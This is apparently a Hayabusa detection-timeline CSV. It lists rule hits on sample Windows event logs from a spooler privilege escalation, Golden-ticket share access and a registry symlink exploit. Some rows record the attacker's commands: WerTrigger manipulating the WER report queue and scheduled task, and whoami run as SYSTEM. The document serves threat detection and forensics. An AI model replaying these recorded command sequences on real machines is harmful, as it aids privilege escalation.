2020-08-12 22:04:27.603 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\STDSCHEM.GDL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.603 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\STDSCHMX.GDL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.622 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\Old\1 | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.949 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.949 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\blah\blah\phoneinfo.dll | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.949 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Suspicious Print Port | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ports\c:\blah\blah\phoneinfo.dll: (Empty) | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:28.509 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\PRINTERS\00002.SPL | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2532 | PGUID: 747F3D96-E8D1-5F33-0000-001007B63A00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:28.509 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\PRINTERS\00002.SHD | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:28.521 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\PRINTERS\00002.SHD | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:05:19.719 +09:00,MSEDGEWIN10,4,info,,Sysmon Service State Changed,State: Started | SchemaVersion: 4.23,rules/hayabusa/sysmon/events/4_SysmonServiceStateChanged.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:05:20.029 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\SYSTEM32\cmd.exe /c """"C:\Program Files\Npcap\CheckStatus.bat"""" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | LID: 0x3e7 | PID: 1740 | PGUID: 747F3D96-E90A-5F33-0000-0010863C0100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:05:20.378 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3320 | PGUID: 747F3D96-E90C-5F33-0000-0010CB420200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:05:20.378 +09:00,MSEDGEWIN10,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:05:36.555 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x41c24 | PID: 5128 | PGUID: 747F3D96-E920-5F33-0000-001043920A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:05:38.260 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c reg query ""HKLM\Software\WOW6432Node\Npcap"" /ve 2>nul | find ""REG_SZ"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\SYSTEM32\cmd.exe /c """"C:\Program Files\Npcap\CheckStatus.bat"""" | LID: 0x3e7 | PID: 6952 | PGUID: 747F3D96-E922-5F33-0000-00107A2B0B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:05:38.260 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:05:45.570 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\Explorer.EXE | Tgt Process: C:\Program Files (x86)\FileZilla Server\FileZilla Server Interface.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 5144 | Src PGUID: 747F3D96-E914-5F33-0000-001009990500 | Tgt PID: 7480 | Tgt PGUID: 747F3D96-E928-5F33-0000-0010B8330D00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:00.737 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.exe /c rmdir /s/q C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: WerTrigger.exe | LID: 0x41c24 | PID: 7836 | PGUID: 747F3D96-E938-5F33-0000-00101CA50E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:00.737 +09:00,MSEDGEWIN10,1,high,,Parent in Public Folder Suspicious Process,,rules/sigma/process_creation/proc_creation_win_public_folder_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:00.737 +09:00,MSEDGEWIN10,1,low,Evas,Windows Cmd Delete File,,rules/sigma/process_creation/proc_creation_win_cmd_delete.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:00.737 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:01.637 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c mkdir,C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: WerTrigger.exe | LID: 0x41c24 | PID: 7852 | PGUID: 747F3D96-E939-5F33-0000-0010ACAB0E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:01.637 +09:00,MSEDGEWIN10,1,high,,Parent in Public Folder Suspicious Process,,rules/sigma/process_creation/proc_creation_win_public_folder_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:02.552 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.exe /c copy Report.wer C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: WerTrigger.exe | LID: 0x41c24 | PID: 7868 | PGUID: 747F3D96-E93A-5F33-0000-001014B30E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:02.552 +09:00,MSEDGEWIN10,1,high,,Parent in Public Folder Suspicious Process,,rules/sigma/process_creation/proc_creation_win_public_folder_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:02.552 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:03.487 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c schtasks /run /TN ""Microsoft\Windows\Windows Error Reporting\QueueReporting"" > nul 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: WerTrigger.exe | LID: 0x41c24 | PID: 7888 | PGUID: 747F3D96-E93B-5F33-0000-0010C1B40E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:03.487 +09:00,MSEDGEWIN10,1,high,,Parent in Public Folder Suspicious Process,,rules/sigma/process_creation/proc_creation_win_public_folder_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:03.487 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:04.075 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\wermgr.exe -upload | LID: 0x3e7 | PID: 8032 | PGUID: 747F3D96-E93C-5F33-0000-0010A6F00E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x3e7 | PID: 7460 | PGUID: 747F3D96-E940-5F33-0000-001039310F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-21 00:35:28.503 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: hack-admu-test1 | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.23.9 | LID: 0x2275e86d,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
2020-08-21 00:36:32.382 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.23.9 | LID: 0x2276a30d,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
2020-08-21 00:36:32.391 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x2276a30d,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
2020-08-21 00:37:06.186 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x2276ac17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
2020-08-21 00:37:14.331 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.23.9 | LID: 0x2276ac17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
2020-08-21 00:37:17.039 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x2276b0af,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
2020-08-21 00:37:35.319 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.23.9 | LID: 0x2276b0af,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
2020-08-21 00:37:35.773 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: JUMP01$ | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.23.9 | LID: 0x2276b890,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
2020-08-21 00:38:23.185 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: not_existing_user | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.23.9 | LID: 0x2276d109,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5140-ADMIN$ share connection with Golden ticket.evtx
2020-08-21 00:39:15.820 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.23.9 | LID: 0x2276ac17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5140-ADMIN$ share connection with Golden ticket.evtx
2020-08-21 00:41:58.884 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: not_existing_user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b90e2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
2020-08-21 00:42:54.177 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9a72,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
2020-08-21 00:42:54.177 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9a8f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
2020-08-21 00:42:54.193 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9aa3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
2020-08-21 00:42:54.193 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9ab2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
2020-08-21 00:42:55.188 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9b27,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
2020-08-21 00:43:04.967 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9e04,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119ba401,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119ba414,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119ba427,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
2020-08-25 18:58:51.434 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\{17A6A947-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db | Process: C:\Windows\system32\LogonUI.exe | PID: 8500 | PGUID: 747F3D96-E0DA-5F44-0000-0010B3299600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
2020-08-25 19:02:32.697 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\pagefile.sys | Process: C:\Windows\System32\smss.exe | PID: 308 | PGUID: 747F3D96-6039-5F45-0000-00107B2F0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
2020-08-25 19:02:32.701 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\swapfile.sys | Process: C:\Windows\System32\smss.exe | PID: 308 | PGUID: 747F3D96-6039-5F45-0000-00107B2F0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
2020-08-25 19:07:58.690 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89 | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 747F3D96-E1B3-5F44-0000-001061BC0100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
2020-08-25 19:07:58.702 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89\merged.gpd | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 747F3D96-E1B3-5F44-0000-001061BC0100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
2020-08-25 19:07:58.704 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89\pdc.xml | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 747F3D96-E1B3-5F44-0000-001061BC0100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
2020-08-25 19:07:58.710 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89\device_bidi.gpd | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 747F3D96-E1B3-5F44-0000-001061BC0100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
2020-08-25 19:07:58.719 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89\5b120a24.BUD | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 747F3D96-E1B3-5F44-0000-001061BC0100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
2020-08-25 19:08:05.763 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
2020-08-25 19:08:05.770 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man.LOG1 | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
2020-08-25 19:08:05.772 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man.LOG2 | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
2020-08-25 19:08:05.776 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TM.blf | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
